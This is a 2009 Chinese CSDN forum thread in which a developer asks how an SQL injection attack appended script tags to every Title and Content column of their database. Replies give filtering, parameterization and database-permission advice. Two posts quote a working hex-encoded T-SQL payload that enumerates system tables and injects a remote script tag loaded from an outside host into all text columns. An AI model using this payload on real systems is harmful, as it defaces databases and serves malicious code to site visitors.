这种sql注入方式是如何做到的-CSDN论坛

⋅关于集合性能遍历问题 ⋅！！！急急急。。。怎么实现在线visio，并可以编辑，保存？？？？ ⋅求教enterprise Library中关于日志的使用。。 更多帖子 关注私信空间博客 lk829 本版专家分：315 结帖率 100%: 数据库所有表字段为Title和Content的字段被更新加入了<script></script>
表名都是用的比较繁琐的名字
弱弱的问下难道不知道表名只知道字段名也可以注入吗他这是使用的什么方式

1 2009-09-02 10:14:48

回复数 31 只看楼主引用举报楼主

lo_565 本版专家分：20: 严重关注中

0 2009-09-02 10:19:26

只看TA 引用举报 #1 得分 0

⋅读写流我把byte数组长度设置成1000或2000时得到的文件总出错 ⋅有什么办法可以跨域进行大量数据提交？ ⋅新上线的网站帮测试一下bug 来者有分 更多帖子 关注私信空间博客 Jarvis-Li 本版专家分：1019: 在地址栏传参时被注入的，用的是一种注入工具，sql代码怎么写的也没弄明白了，前几天我写的程序也被注入了，
把参数里的select from ‘ ＝ update set add delete ……一些关键字屏蔽掉，就行了

<script type="text/javascript">

</script>
这个只是js的地址栏过滤，不是很保险，最好加上程序写的把接收到的参数过滤掉

0 2009-09-02 10:20:11

只看TA 引用举报 #2 得分 8

⋅样式引用地址又再次失效问题 ⋅求一个正则 ⋅大家会支持哪个,谢谢 更多帖子 关注私信空间博客 sk_aqi 本版专家分：8970: 非常严重关注...

0 2009-09-02 10:21:44

只看TA 引用举报 #3 得分 0

⋅招商银行信用卡中心复试 ⋅这算不算.NET的BUG，老鸟进来说说 ⋅哥脱了裤衩，一样闪光！ 更多帖子 关注私信空间博客 zhouyanfss 本版专家分：5277: 问题出在你UPDATE语句那里，贴出来看看

0 2009-09-02 10:24:38

只看TA 引用举报 #4 得分 0

沉序员 本版专家分：1544: DD

0 2009-09-02 10:26:34

只看TA 引用举报 #5 得分 0

⋅怎么选？ ⋅选哪个？ ⋅选哪个？ 更多帖子 关注私信空间博客 阿彪兄 本版专家分：5964: 支持一下

0 2009-09-02 10:50:24

只看TA 引用举报 #6 得分 0

⋅netcore里面怎么访问vue的发布页面？ ⋅优化一下这条sql ⋅有没有ipv6的查询库？ 更多帖子 关注私信空间博客 zzxap 本版专家分：55400 黄花 2009年4月 .NET技术大版内专家分月排行榜第二 2009年3月 .NET技术大版内专家分月排行榜第二 蓝花 2009年5月 .NET技术大版内专家分月排行榜第三: 将URL加密一下，想在url注入就不那么容易了

0 2009-09-02 11:02:21

只看TA 引用举报 #7 得分 5

lk829 本版专家分：315: 问题是前台所有页面参数字符串都进行了参数过滤（正则）

0 2009-09-02 11:03:20

只看TA 引用举报 #8 得分 0

⋅关于集合性能遍历问题 ⋅！！！急急急。。。怎么实现在线visio，并可以编辑，保存？？？？ ⋅求教enterprise Library中关于日志的使用。。 更多帖子 关注私信空间博客 lk829 本版专家分：315: 所有表字段为Title和Content的字段被注入没有的就没有被注入
而且不定期的自动更新注入
我想可能使用的某个工具进行

0 2009-09-02 11:05:45

只看TA 引用举报 #9 得分 0

zhang17500332 本版专家分：716: 在请求的地方加过滤过滤掉这些关键字

0 2009-09-02 12:12:43

只看TA 引用举报 #10 得分 0

duanjiwei 本版专家分：711: 跟踪

0 2009-09-02 12:27:14

只看TA 引用举报 #11 得分 0

fuzijing 本版专家分：835: ...

0 2009-09-02 17:34:26

只看TA 引用举报 #12 得分 0

john_hee 本版专家分：1022: 俺也遇到过，主要是利用JS 通过 url 注入的，重点是在通过URL 传值的地方进行调整

0 2009-09-02 17:39:26

只看TA 引用举报 #13 得分 10

⋅excel 条件公式指教 ⋅WPF 帧动画平滑优化求不吝赐教 ⋅WPF 帧动画平滑优化求前辈不吝赐教 更多帖子 关注私信空间博客 zjybushiren88888 本版专家分：3894: 参数化+输入过滤. 不行?

0 2009-09-02 17:44:19

只看TA 引用举报 #14 得分 0

sdnjwang 本版专家分：340: 关注，希望那位大侠将一些代码传上来，谢谢

0 2009-09-02 17:52:39

只看TA 引用举报 #15 得分 0

zhiwei_shi 本版专家分：14: mark

0 2009-09-02 18:27:42

只看TA 引用举报 #16 得分 0

⋅高手们帮我测试下啊我想要uid显示不同的值可是我这样为什么值一样啊 ⋅我想根据条件显示不同的信息绑定到datalist里面但是结果还是一样 ⋅高手们我在做一个交友网，想实现这样的一个功能怎么做。 更多帖子 关注私信空间博客 devilidea 本版专家分：270: 差异备份 create table cc() insert into cc()values('<script>window.open("baidu.com")</script>')

0 2009-09-02 19:20:51

只看TA 引用举报 #17 得分 10

lk829 本版专家分：315: 大家都来关注下

0 2009-09-04 11:10:26

只看TA 引用举报 #18 得分 0

lk829 本版专家分：315: 还有大虾赐教下吗

0 2009-09-05 14:13:49

只看TA 引用举报 #19 得分 0

⋅小企业的一套网上商城做需要多少钱呀？ ⋅帮忙看看我怎么能把字段中的"■"替换成回车呀？ ⋅sql_server2000用差异备份的东西怎么用sql语句恢复？ 更多帖子 关注私信空间博客 saidong 本版专家分：57: 彻底杜绝SQL注入

1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户，并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键－属性－权限－在sysobjects与syscolumns上面打“×”
5、通过以下代码检测（失败表示权限正确，如能显示出来则表明权限太高）：
DECLARE   @T   varchar(255),
@C   varchar(255)
DECLARE   Table_Cursor   CURSOR   FOR
Select   a.name,b.name   from   sysobjects   a,syscolumns   b
where   a.id=b.id   and   a.xtype= 'u '   and   (b.xtype=99   or   b.xtype=35   or   b.xtype=231   or   b.xtype=167)
OPEN   Table_Cursor
FETCH   NEXT   FROM   Table_Cursor   INTO   @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN   print   @c
FETCH   NEXT   FROM   Table_Cursor   INTO   @T,@C
END
CLOSE   Table_Cursor
DEALLOCATE   Table_Cursor
---------------------------------------------------------------

0 2009-09-05 16:43:42

只看TA 引用举报 #21    得分 7

saidong 本版专家分：57: 从论坛其他贴子找到的，试后管用。

0 2009-09-05 16:47:12

只看TA 引用举报 #22 得分 0

wpfonline 本版专家分：407: 关注中我们公司的网站也老这样

0 2009-09-05 17:17:03

只看TA 引用举报 #23 得分 0

⋅CSS scroll snap points 怎么用特征检测是否支持? ⋅text-size-adjust: 100% 有什么作用？ ⋅好久不来，散分，求好运 更多帖子 关注私信空间博客 sohighthesky 本版专家分：9648 红花 2009年11月 Web 开发大版内专家分月排行榜第一 黄花 2009年12月 Web 开发大版内专家分月排行榜第二 蓝花 2009年10月 Web 开发大版内专家分月排行榜第三: 引用 8 楼 lk829 的回复:
问题是前台所有页面参数字符串都进行了参数过滤（正则）

前台过滤了有用么？

前后台一起过滤，

0 2009-09-05 19:18:27

只看TA 引用举报 #24 得分 0

⋅关于集合性能遍历问题 ⋅！！！急急急。。。怎么实现在线visio，并可以编辑，保存？？？？ ⋅求教enterprise Library中关于日志的使用。。 更多帖子 关注私信空间博客 lk829 本版专家分：315: 引用 24 楼 sohighthesky 的回复:
引用 8 楼 lk829 的回复:
问题是前台所有页面参数字符串都进行了参数过滤（正则）

前台过滤了有用么？

前后台一起过滤，

------------------
在弱弱的问下后台必须需要权限才能访问页面怎么来获取登录权限

0 2009-09-07 10:03:12

只看TA 引用举报 #25 得分 0

⋅罐装天才(Getting over it)无限存档+通关，太虐心了~~~ ⋅看到天轰穿老师的学云网日渐规模，倍感欣慰！~~~ ⋅[VC++版下载]《小鸡快跑》简单源码 更多帖子 关注私信空间博客 mngzilin 本版专家分：38916 蓝花 2010年1月 .NET技术大版内专家分月排行榜第三: 这是利用js操作cookies的自动回发进行注入的。

0 2009-09-07 10:06:11

只看TA 引用举报 #26 得分 10

⋅关于集合性能遍历问题 ⋅！！！急急急。。。怎么实现在线visio，并可以编辑，保存？？？？ ⋅求教enterprise Library中关于日志的使用。。 更多帖子 关注私信空间博客 lk829 本版专家分：315: 引用 26 楼 mngzilin 的回复:
这是利用js操作cookies的自动回发进行注入的。

========
mngzilin 能否再告知详细点说明下原理

0 2009-09-07 10:21:50

只看TA 引用举报 #27 得分 0

weifei_tlp 本版专家分：470: 反正只有有数据输入的地方，都进行检查
当然最好是用存储过程，呵呵，就不用检查

0 2009-09-07 10:34:26

只看TA 引用举报 #28 得分 0

lk829 本版专家分：315: 其实我最想知道的是这种注入方式是如何实现的
估计不是参数注入这么简单

0 2009-09-07 10:44:41

只看TA 引用举报 #29 得分 0

⋅有使用过ebay api LMS 的吗 ⋅有木有php+solr 的开源的项目 ⋅excell 导入实时显示，总条数，导入条数，完成百分比 更多帖子 关注私信空间博客 le616 本版专家分：1124: dEcLaRe @s vArChAr(8000) sEt @s=dEcLaRe @s vArChAr(8000) sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f383838392e73732e6c613e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 eXeC(@s)
------------

0 2009-09-07 10:52:21

只看TA 引用举报 #30 得分 0

⋅关于集合性能遍历问题 ⋅！！！急急急。。。怎么实现在线visio，并可以编辑，保存？？？？ ⋅求教enterprise Library中关于日志的使用。。 更多帖子 关注私信空间博客 lk829 本版专家分：315: 引用 30 楼 le616 的回复:
dEcLaRe @s vArChAr(8000) sEt @s=dEcLaRe @s vArChAr(8000) sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f383838392e73732e6c613e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 eXeC(@s)
------------

－－－－－－－－－－
你发的这种只不过是cookies注入的的数据

0 2009-09-07 10:56:55

只看TA 引用举报 #31 得分 0

这种sql注入方式是如何做到的 [问题点数：50分，结帖人lk829]